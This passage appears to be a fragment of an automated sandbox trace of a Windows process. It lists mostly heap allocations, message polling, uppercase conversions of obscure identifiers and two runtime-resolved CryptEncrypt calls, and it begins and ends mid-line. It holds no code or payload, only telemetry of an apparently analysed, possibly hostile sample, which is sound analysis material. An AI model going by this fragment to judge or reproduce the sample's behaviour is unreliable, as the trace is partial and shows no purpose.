(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0090.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0090.170] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0090.171] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0090.171] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.171] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0090.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.171] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0090.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0090.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0090.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0090.172] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.172] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0090.173] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.173] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0090.173] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a883c8 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.176] CryptEncrypt (in: hKey=0x9a3d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4b80, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4b88) returned 1 [0090.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.176] CharLowerBuffW (in: lpsz="byte[19336]", cchLength=0xb | out: lpsz="byte[19336]") returned 0xb [0090.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.177] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.177] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.177] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.177] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.177] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.177] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9f10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.177] CryptEncrypt (in: hKey=0x9a3d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a883c8*, pdwDataLen=0x8cef60*=0x4b80, dwBufLen=0x4b88 | out: pbData=0x2a883c8*, pdwDataLen=0x8cef60*=0x4b88) returned 1 [0090.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.180] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.180] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.180] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.180] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.180] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 